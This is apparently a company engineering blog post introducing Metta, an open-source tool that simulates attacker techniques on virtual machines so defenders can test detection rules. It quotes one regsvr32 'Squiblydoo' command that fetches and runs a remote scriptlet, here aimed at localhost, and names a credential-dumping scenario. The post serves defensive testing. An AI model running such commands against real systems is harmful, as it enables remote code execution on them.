Introducing Metta: Uber’s Open Source Tool for Adversarial Simulation
Chris Gates, Senior Security Engineer
Today, Uber announced the open-source release of Metta, a tool for basic adversarial simulation. Modern software techniques such as end-to-end functional testing and test-driven development work well for software design, and these same techniques can be applied to detection systems. In fact, Metta was born from multiple internal projects where we’d already brought DevOps concepts to our detection rules.
As an emerging concept, the industry has yet to settle on a definitive definition of adversarial simulation, but it involves simulating [components of] targeted attacks in order to test both an organization’s instrumentation stacks and their ability to respond to the attack via their incident response process.
This differs from Red Teaming in that adversarial simulation is typically a cooperative activity between the simulation runners and the simulation recipients with an end goal of validating defensive telemetry and testing incident response plans and playbooks. Raphael Mudge wrote a great blog post on the subject, which I recommend.
I’ve covered this topic for the last three years at various conferences [Brucon Slides] [Brucon Video] [WWHF Slides] [WWHF Video] with Chris Nickerson from Lares. At the same time, I made a professional shift from full-time breaker to part/full time fixer with Purple Teaming & Adversarial Simulation.
Ultimately, I began to see far more positive progression with ongoing adversarial simulation than I ever did with periodic red teams (which I previously discussed here). Red Teams end up being about a single point in time and are primarily focused on conducting attacks without being caught by the Blue Team. However, with the right level of organizational maturity, regularly scheduled adversarial simulations can be more valuable in validating defensive rules and incident response processes.
After reviewing several vendor options, we choose to build our own solution based on several existing projects. One project standardizes and version controls our detection rules and enriches them with metadata; similar to the metadata fields you see in the Metta action and scenario files.
The other projects uses the underlying Metta engine to programmatically execute actions against various instrumented virtual machines to validate our detection rules and pipelines in an automated and repeatable way. This allows us to validate the rule syntax is correct (and stays correct) and ensure that our alerting pipeline is up and functioning as intended multiple times a day.
Metta uses Redis/Celery, python, and vagrant with virtualbox to do adversarial simulation. This allows you to test (mostly) your host based instrumentation but may also allow you to test any network based detection and controls depending on how you set up your vagrants.
Metta parses yaml files with a list of “actions” [multistep attacker behavior] and uses Celery to queue these actions up and run them one at a time requiring no manual interaction with the hosts.
An example action file looks like the below:
As you can see the yaml file maps back to both the MITRE ATT&CK Phase and Technique, a link to some information about the attack, and includes (in this case) one purple_action of:
cmd.exe /c regsvr32 /s /n /u /i:http://127.0.0.1/file.sct scrobj.dll
This command will execute the regsrv32 “Squiblydoo” attack against the local host in a benign way. This command will not cause any lasting damage to the host but should create any host based alerting for the attack to fire.
Of course it is also possible to perform multiple actions by listing them one at a time and Metta will run them in sequence:
You can also perform scenarios, which are a list of action files. This way you can simulate multiple phases of an attack with one file. Here is an example of a scenario file:
This scenario will run the Discovery/discovery_account actions, followed by the Credential_Access/credaccess_win_creddump actions, followed by the Execution/execution_regsvrs32 actions.
The reporting functionality is fairly basic but Metta does log all output to a json file in the project root directory and to a simple HTML log. This should allow you to incorporate the results into whatever framework or tool you wish for any processing after the simulation.